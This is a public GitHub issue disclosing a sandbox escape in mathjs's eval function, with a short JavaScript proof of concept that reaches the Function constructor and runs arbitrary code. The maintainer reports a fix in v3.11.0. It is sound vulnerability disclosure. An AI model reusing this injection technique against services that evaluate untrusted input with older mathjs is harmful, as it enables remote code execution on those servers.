### ISSUE TITLE
Security issues in eval

### ISSUE THREAD

**Issue by xfix** [josdejong/mathjs#822]
I was going to report this privately, but I figured that somebody else already leaked issues (#821), so whatever. It's not that this may make things worse.

I read an article on Hacker News about discovering a bug in library, and I was like, surely there are more issues when you allow direct access to JavaScript. I do admit, finding such issues was a fun game, but I found this.

```javascript
require('mathjs').eval(String.raw`
    {}.constructor.assign(cos.constructor, {binding: cos.bind})
    {}.constructor.assign(cos.constructor, {bind: null})
    cos.constructor.binding()("console.log(/HACKED/)")()
`)
```

Blacklists are practically guaranteed to have more issues like that. Don't allow direct access to JavaScript objects like that, especially not for function calls (you may want to have a whitelist of functions?).

**Comment by josdejong** [comment]
Thanks a lot @xfix , keep them coming! Your issue should be solved in the just released `v3.11.0`

Thanks for thinking about reporting the issue in private, please do so the next time, that's always a good idea :)

**Comment by xfix** [comment]
@josdejong Okay, sent you an e-mail.

**Comment by josdejong** [comment]
Thanks!
